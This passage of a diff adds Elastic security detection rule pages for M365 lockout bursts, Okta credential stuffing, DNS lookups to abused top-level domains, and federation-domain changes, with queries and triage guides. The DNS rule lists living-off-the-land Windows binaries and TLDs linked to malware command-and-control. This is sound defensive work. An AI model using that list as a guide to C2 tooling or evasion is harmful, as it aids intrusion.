+Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts. 
+ +This rule uses ESQL aggregations and thus has dynamically generated fields. Correlation of the values in the alert document may need to be performed to the original sign-in and Graph events for further context. + + +*Investigation Steps* + + +- Review the `user_id_list`: Are specific naming patterns targeted (e.g., admin, helpdesk)? +- Examine `ip_list` and `source_orgs`: Look for suspicious ISPs or hosting providers. +- Check `duration_seconds`: A very short window with a high lockout rate often indicates automation. +- Confirm lockout policy thresholds with IAM or Entra ID admins. Did the policy trigger correctly? +- Use the `first_seen` and `last_seen` values to pivot into related authentication or audit logs. +- Correlate with any recent detection of password spraying or credential stuffing activity. +- Review the `request_type` field to identify which authentication methods were used (e.g., OAuth, SAML, etc.). +- Check for any successful logins from the same IP or ASN after the lockouts. + + +*False Positive Analysis* + + +- Automated systems with stale credentials may cause repeated failed logins. +- Legitimate bulk provisioning or scripted tests could unintentionally cause account lockouts. +- Red team exercises or penetration tests may resemble the same lockout pattern. +- Some organizations may have a high volume of lockouts due to user behavior or legacy systems. + + +*Response Recommendations* + + +- Notify affected users and confirm whether activity was expected or suspicious. +- Lock or reset credentials for impacted accounts. +- Block the source IP(s) or ASN temporarily using conditional access or firewall rules. +- Strengthen lockout and retry delay policies if necessary. +- Review the originating application(s) involved via `request_types`. 
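+
+To pivot from the aggregated alert back into the raw lockout events (as suggested above), an illustrative ES|QL query along these lines can be used; the time window is a placeholder and should be widened or narrowed to cover the alert's first and last seen values:
+
+[source, js]
+----------------------------------
+// Illustrative pivot query, not part of the rule itself
+from logs-o365.audit-*
+| mv_expand event.category
+| where event.dataset == "o365.audit"
+    and event.category == "authentication"
+    and o365.audit.LogonError == "IdsLocked"
+    // placeholder window; adjust it around the alert's first_seen/last_seen values
+    and @timestamp >= now() - 1 day
+| stats Esql.event_count = count(*),
+        Esql.request_type_values = values(o365.audit.ExtendedProperties.RequestType),
+        Esql.timestamp_first_seen = min(@timestamp),
+        Esql.timestamp_last_seen = max(@timestamp)
+    by o365.audit.UserId, source.ip
+| sort Esql.event_count desc
+----------------------------------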
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-o365.audit-* +| mv_expand event.category +| eval + Esql.time_window_date_trunc = date_trunc(5 minutes, @timestamp) +| where + event.dataset == "o365.audit" and + event.category == "authentication" and + event.provider in ("AzureActiveDirectory", "Exchange") and + event.action in ("UserLoginFailed", "PasswordLogonInitialAuthUsingPassword") and + to_lower(o365.audit.ExtendedProperties.RequestType) rlike "(oauth.*||.*login.*)" and + o365.audit.LogonError == "IdsLocked" and + to_lower(o365.audit.UserId) != "not available" and + o365.audit.Target.Type in ("0", "2", "6", "10") and + source.`as`.organization.name != "MICROSOFT-CORP-MSN-as-BLOCK" +| stats + Esql_priv.o365_audit_UserId_count_distinct = count_distinct(to_lower(o365.audit.UserId)), + Esql_priv.o365_audit_UserId_values = values(to_lower(o365.audit.UserId)), + Esql.source_ip_values = values(source.ip), + Esql.source_ip_count_distinct = count_distinct(source.ip), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + Esql.source_as_organization_name_count_distinct = count_distinct(source.`as`.organization.name), + Esql.source_geo_country_name_values = values(source.geo.country_name), + Esql.source_geo_country_name_count_distinct = count_distinct(source.geo.country_name), + Esql.o365_audit_ExtendedProperties_RequestType_values = values(to_lower(o365.audit.ExtendedProperties.RequestType)), + Esql.timestamp_first_seen = min(@timestamp), + Esql.timestamp_last_seen = max(@timestamp), + Esql.event_count = count(*) + by Esql.time_window_date_trunc +| eval + Esql.event_duration_seconds = date_diff("seconds", Esql.timestamp_first_seen, Esql.timestamp_last_seen) +| keep + Esql.time_window_date_trunc, + Esql_priv.o365_audit_UserId_count_distinct, + Esql_priv.o365_audit_UserId_values, + Esql.source_ip_values, + Esql.source_ip_count_distinct, + Esql.source_as_organization_name_values, + Esql.source_as_organization_name_count_distinct, + Esql.source_geo_country_name_values, + Esql.source_geo_country_name_count_distinct, + Esql.o365_audit_ExtendedProperties_RequestType_values, + Esql.timestamp_first_seen, + Esql.timestamp_last_seen, + Esql.event_count, + Esql.event_duration_seconds +| where + Esql_priv.o365_audit_UserId_count_distinct >= 10 and + Esql.event_count >= 10 and + Esql.event_duration_seconds <= 300 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-client-address.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-client-address.asciidoc new file mode 100644 index 0000000000..20926bf74d --- /dev/null +++ 
b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-client-address.asciidoc @@ -0,0 +1,162 @@ +[[prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-client-address]] +=== Multiple Okta User Authentication Events with Client Address + +Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US +* https://developer.okta.com/docs/reference/api/event-types/ +* https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy +* https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection +* https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/ +* https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security +* https://www.elastic.co/security-labs/starter-guide-to-understanding-okta + +*Tags*: + +* Use Case: Identity and Access Audit +* Data Source: Okta +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Multiple Okta User Authentication Events with Client Address* + + +This rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack. + + +*Possible investigation steps:* + +Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity. +- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields. +- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields. +- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy. + - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying. +- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful. + - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context. +- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field. 
+ - Historical analysis should indicate if this device token hash is commonly associated with the user.
+- Review the `okta.event_type` field to determine the type of authentication event that occurred.
+ - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.
+ - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.
+ - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.
+- Examine the `okta.outcome.result` field to determine if the authentication was successful.
+- Review the past activities of the actor(s) involved in this action by checking their previous actions.
+- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.
+ - This may help determine the authentication and authorization actions that occurred between the user, Okta, and the application.
+
+
+*False positive analysis:*
+
+- A user may have legitimately started a session via a proxy for security or privacy reasons.
+- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.
+ - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.
+ - Shared systems such as kiosks and conference room computers may be used by multiple users.
+ - Shared working spaces may have a single endpoint that is used by multiple users.
+
+
+*Response and remediation:*
+
+- Review the profile of the users involved in this action to determine if proxy usage may be expected.
+- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.
+- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involved and enabling multi-factor authentication (MFA).
+ - If MFA is already enabled, consider resetting MFA for the users.
+- If any of the users are not legitimate, consider deactivating the user's account.
+- Conduct a review of Okta policies and ensure they are in accordance with security best practices.
+- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.
+ - If so, confirm with the user this was a legitimate request.
+ - If this was not a legitimate request, consider deactivating the user's account temporarily.
+ - Reset passwords and reset MFA for the user.
+- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.
+ - This will prevent future occurrences of this event for this device from triggering the rule.
+ - Alternatively, adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.
+ - This should be done with caution as it may prevent legitimate alerts from being generated.
+
+
+==== Setup
+
+
+The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.
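+
+As a triage aid, the raw authentication events behind an alert can be pulled back with a short ES|QL search before moving to the rule query below. This is a sketch only: the client address shown (192.0.2.10) is a hypothetical placeholder for the `okta.client.ip` value reported in the alert.
+
+[source, js]
+----------------------------------
+// Sketch only: substitute the client IP reported in the alert.
+from logs-okta*
+| where
+    event.dataset == "okta.system" and
+    okta.client.ip == "192.0.2.10" and
+    (event.action == "user.session.start" or event.action like "user.authentication.*")
+| keep
+    @timestamp,
+    okta.actor.alternate_id,
+    okta.client.ip,
+    okta.client.user_agent.raw_user_agent,
+    event.action,
+    event.outcome,
+    okta.outcome.reason
+| sort @timestamp desc
+
+----------------------------------
+
+Successful outcomes mixed in with the `INVALID_CREDENTIALS` failures are the accounts to prioritize for compromise review.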
+ +==== Rule query + + +[source, js] +---------------------------------- +from logs-okta* +| where + event.dataset == "okta.system" and + (event.action == "user.session.start" or event.action like "user.authentication.*") and + okta.outcome.reason == "INVALID_CREDENTIALS" +| keep + okta.client.ip, + okta.actor.alternate_id, + okta.actor.id, + event.action, + okta.outcome.reason +| stats + Esql.okta_actor_id_count_distinct = count_distinct(okta.actor.id) + by + okta.client.ip, + okta.actor.alternate_id +| where + Esql.okta_actor_id_count_distinct > 5 +| sort + Esql.okta_actor_id_count_distinct desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc new file mode 100644 index 0000000000..53711bb8b5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc @@ -0,0 +1,160 @@ +[[prebuilt-rule-8-19-8-multiple-okta-user-authentication-events-with-same-device-token-hash]] +=== Multiple Okta User Authentication Events with Same Device Token Hash + +Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. 
+ +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US +* https://developer.okta.com/docs/reference/api/event-types/ +* https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy +* https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection +* https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/ +* https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security +* https://www.elastic.co/security-labs/starter-guide-to-understanding-okta + +*Tags*: + +* Use Case: Identity and Access Audit +* Data Source: Okta +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Multiple Okta User Authentication Events with Same Device Token Hash* + + +This rule detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack. + + +*Possible investigation steps:* + +- Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.debug_context.debug_data.dt_hash` values can be used to pivot into the raw authentication events related to this activity. +- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields. +- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields. +- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy. + - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying. +- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful. + - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context. +- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field. + - Historical analysis should indicate if this device token hash is commonly associated with the user. +- Review the `okta.event_type` field to determine the type of authentication event that occurred. + - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons. + - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying. +- Examine the `okta.outcome.result` field to determine if the authentication was successful. 
+- Review the past activities of the actor(s) involved in this action by checking their previous actions.
+- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.
+ - This may help determine the authentication and authorization actions that occurred between the user, Okta, and the application.
+
+
+*False positive analysis:*
+
+- A user may have legitimately started a session via a proxy for security or privacy reasons.
+- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.
+ - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.
+ - Shared systems such as kiosks and conference room computers may be used by multiple users.
+ - Shared working spaces may have a single endpoint that is used by multiple users.
+
+
+*Response and remediation:*
+
+- Review the profile of the users involved in this action to determine if proxy usage may be expected.
+- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.
+- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involved and enabling multi-factor authentication (MFA).
+ - If MFA is already enabled, consider resetting MFA for the users.
+- If any of the users are not legitimate, consider deactivating the user's account.
+- Conduct a review of Okta policies and ensure they are in accordance with security best practices.
+- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.
+ - If so, confirm with the user this was a legitimate request.
+ - If this was not a legitimate request, consider deactivating the user's account temporarily.
+ - Reset passwords and reset MFA for the user.
+- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.
+ - This will prevent future occurrences of this event for this device from triggering the rule.
+
+
+==== Setup
+
+
+The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.
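+
+For the device token pivot described in the triage steps, a similar ES|QL sketch can summarize every account observed with the flagged hash. The hash value below is a hypothetical placeholder; substitute the `okta.debug_context.debug_data.dt_hash` value from the alert.
+
+[source, js]
+----------------------------------
+// Sketch only: substitute the dt_hash value from the alert.
+from logs-okta*
+| where
+    event.dataset == "okta.system" and
+    okta.debug_context.debug_data.dt_hash == "<dt_hash-from-alert>" and
+    (event.action like "user.authentication.*" or event.action == "user.session.start")
+| stats
+    Esql.event_count = count(*),
+    Esql.event_outcome_values = values(event.outcome)
+    by okta.actor.alternate_id
+| sort Esql.event_count desc
+
+----------------------------------
+
+A single hash spread across many distinct `okta.actor.alternate_id` values supports the credential stuffing hypothesis, while a hash historically tied to one user points toward a false positive.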
+ +==== Rule query + + +[source, js] +---------------------------------- +from logs-okta* +| where + event.dataset == "okta.system" and + (event.action like "user.authentication.*" or event.action == "user.session.start") and + okta.debug_context.debug_data.dt_hash != "-" and + okta.outcome.reason == "INVALID_CREDENTIALS" +| keep + event.action, + okta.debug_context.debug_data.dt_hash, + okta.actor.id, + okta.actor.alternate_id, + okta.outcome.reason +| stats + Esql.okta_actor_id_count_distinct = count_distinct(okta.actor.id) + by + okta.debug_context.debug_data.dt_hash, + okta.actor.alternate_id +| where + Esql.okta_actor_id_count_distinct > 20 +| sort + Esql.okta_actor_id_count_distinct desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-network-activity-to-a-suspicious-top-level-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-network-activity-to-a-suspicious-top-level-domain.asciidoc new file mode 100644 index 0000000000..4bd55c6733 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-network-activity-to-a-suspicious-top-level-domain.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-8-network-activity-to-a-suspicious-top-level-domain]] +=== Network Activity to a Suspicious Top Level Domain + +Identifies DNS queries to commonly abused Top Level Domains by common LOLBINs or executable running from world writable directories or unsigned binaries. This behavior matches on common malware C2 abusing less formal domain names. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.network-* +* logs-sentinel_one_cloud_funnel.* +* logs-crowdstrike.fdr* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.cybercrimeinfocenter.org/top-20-tlds-by-malicious-phishing-domains + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Windows Security Event Logs +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Sysmon + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Network Activity to a Suspicious Top Level Domain* + + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes or malicious scripts. 
+- Review the domain reputation and the frequency of network activity, as well as any download or upload activity.
+- Verify whether the executed process is persistent on the host through common mechanisms such as the Startup folder, a scheduled task, or a Run key.
+- Investigate other alerts associated with the user/host during the past 48 hours.
+- Extract this communication's indicators of compromise (IoCs) and use traffic logs to search for other potentially compromised hosts.
+
+
+*False positive analysis*
+
+
+- Trusted domain from an expected process running in the environment.
+
+
+*Response and remediation*
+
+
+- Initiate the incident response process based on the outcome of the triage.
+- Isolate the involved host to prevent further post-compromise behavior.
+- Immediately block the identified indicators of compromise (IoCs).
+- Implement any temporary network rules, procedures, and segmentation required to contain the attack.
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.
+- Update firewall rules to be more restrictive.
+- Reimage the host operating system or restore the compromised files to clean versions.
+- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.
+- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+network where host.os.type == "windows" and dns.question.name != null and
+  (
+   process.name : ("MSBuild.exe", "mshta.exe", "wscript.exe", "powershell.exe", "pwsh.exe", "msiexec.exe", "rundll32.exe",
+                   "bitsadmin.exe", "InstallUtil.exe", "python.exe", "regsvr32.exe", "dllhost.exe", "node.exe",
+                   "java.exe", "javaw.exe", "*.pif", "*.com", "*.scr") or
+   (?process.code_signature.trusted == false or ?process.code_signature.exists == false) or
+   ?process.code_signature.subject_name : ("AutoIt Consulting Ltd", "OpenJS Foundation", "Python Software Foundation") or
+   ?process.executable : ("?:\\Users\\*.exe", "?:\\ProgramData\\*.exe")
+  ) and
+dns.question.name regex """.*\.(top|buzz|xyz|rest|ml|cf|gq|ga|onion|monster|cyou|quest|cc|bar|cfd|click|cam|surf|tk|shop|club|icu|pw|ws|online|fun|life|boats|store|hair|skin|motorcycles|christmas|lol|makeup|mom|bond|beauty|biz|live|work|zip|country|accountant|date|party|science|loan|win|men|faith|review|racing|download|host)"""
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Command and Control
+** ID: TA0011
+** Reference URL: https://attack.mitre.org/tactics/TA0011/
+* Technique:
+** Name: Application Layer Protocol
+** ID: T1071
+** Reference URL: https://attack.mitre.org/techniques/T1071/
+* Sub-technique:
+** Name: DNS
+** ID: T1071.004
+** Reference URL: https://attack.mitre.org/techniques/T1071/004/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-new-or-modified-federation-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-new-or-modified-federation-domain.asciidoc
new file mode 100644
index 0000000000..b863eb0cc5
--- /dev/null
+++ 
b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-new-or-modified-federation-domain.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-19-8-new-or-modified-federation-domain]] +=== New or Modified Federation Domain + +Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-accepteddomain?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-federateddomain?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-accepteddomain?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/add-federateddomain?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/set-accepteddomain?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoldomainfederationsettings?view=azureadps-1.0 + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 211 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating New or Modified Federation Domain* + + +Federation domains enable trust between Office 365 and external identity providers, facilitating seamless authentication. Adversaries may exploit this by altering federation settings to redirect authentication flows, potentially gaining unauthorized access. The detection rule monitors specific actions like domain modifications, signaling potential privilege escalation attempts, and alerts analysts to investigate these changes. + + +*Possible investigation steps* + + +- Review the event logs for the specific actions listed in the query, such as "Set-AcceptedDomain" or "Add-FederatedDomain", to identify the exact changes made to the federation domain settings. +- Identify the user account associated with the event by examining the event logs, and verify if the account has the necessary permissions to perform such actions. +- Check the event.outcome field to confirm the success of the action and cross-reference with any recent administrative changes or requests to validate legitimacy. +- Investigate the event.provider and event.category fields to ensure the actions were performed through legitimate channels and not via unauthorized or suspicious methods. +- Analyze the timing and frequency of the federation domain changes to detect any unusual patterns or repeated attempts that could indicate malicious activity. +- Correlate the detected changes with any recent alerts or incidents involving privilege escalation or unauthorized access attempts to assess potential links or broader security implications. 
+ + +*False positive analysis* + + +- Routine administrative changes to federation domains by IT staff can trigger alerts. To manage this, create exceptions for known and scheduled maintenance activities by trusted administrators. +- Automated scripts or tools used for domain management may cause false positives. Identify these scripts and exclude their actions from triggering alerts by whitelisting their associated accounts or IP addresses. +- Integration of new services or applications that require federation domain modifications can be mistaken for suspicious activity. Document these integrations and adjust the rule to recognize these legitimate changes. +- Changes made during organizational restructuring, such as mergers or acquisitions, might appear as unauthorized modifications. Coordinate with relevant departments to anticipate these changes and temporarily adjust monitoring thresholds or exclusions. +- Regular audits or compliance checks that involve domain settings adjustments can lead to false positives. Schedule these audits and inform the security team to prevent unnecessary alerts. + + +*Response and remediation* + + +- Immediately disable any newly added or modified federation domains to prevent unauthorized access. This can be done using the appropriate administrative tools in Office 365. +- Review and revoke any suspicious or unauthorized access tokens or sessions that may have been issued through the compromised federation domain. +- Conduct a thorough audit of recent administrative actions and access logs to identify any unauthorized changes or access patterns related to the federation domain modifications. +- Escalate the incident to the security operations team for further investigation and to determine if additional containment measures are necessary. +- Implement additional monitoring on federation domain settings to detect any further unauthorized changes promptly. +- Communicate with affected stakeholders and provide guidance on any immediate actions they need to take, such as password resets or additional authentication steps. +- Review and update federation domain policies and configurations to ensure they align with best practices and reduce the risk of similar incidents in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
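+
+For hunting beyond the rule's default look-back, the same logic can be approximated in ES|QL to summarize who changed federation or accepted-domain settings recently. This is a sketch, not part of the rule; the 30-day window and the `o365.audit.UserId` field are assumptions to adapt to your environment.
+
+[source, js]
+----------------------------------
+// Sketch only: summarize recent federation and accepted-domain changes per actor.
+from logs-o365.audit-*
+| where
+    event.dataset == "o365.audit" and
+    event.provider == "Exchange" and
+    event.outcome == "success" and
+    event.action in ("Set-AcceptedDomain", "Set-MsolDomainFederationSettings", "Add-FederatedDomain",
+                     "New-AcceptedDomain", "Remove-AcceptedDomain", "Remove-FederatedDomain") and
+    @timestamp > now() - 30 days
+| stats
+    Esql.event_count = count(*)
+    by o365.audit.UserId, event.action
+| sort Esql.event_count desc
+
+----------------------------------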
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:("Set-AcceptedDomain" or +"Set-MsolDomainFederationSettings" or "Add-FederatedDomain" or "New-AcceptedDomain" or "Remove-AcceptedDomain" or "Remove-FederatedDomain") and +event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Domain or Tenant Policy Modification +** ID: T1484 +** Reference URL: https://attack.mitre.org/techniques/T1484/ +* Sub-technique: +** Name: Trust Modification +** ID: T1484.002 +** Reference URL: https://attack.mitre.org/techniques/T1484/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-node-js-pre-or-post-install-script-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-node-js-pre-or-post-install-script-execution.asciidoc new file mode 100644 index 0000000000..0086776bba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-node-js-pre-or-post-install-script-execution.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-8-node-js-pre-or-post-install-script-execution]] +=== Node.js Pre or Post-Install Script Execution + +This rule detects the execution of Node.js pre or post-install scripts. These scripts are executed by the 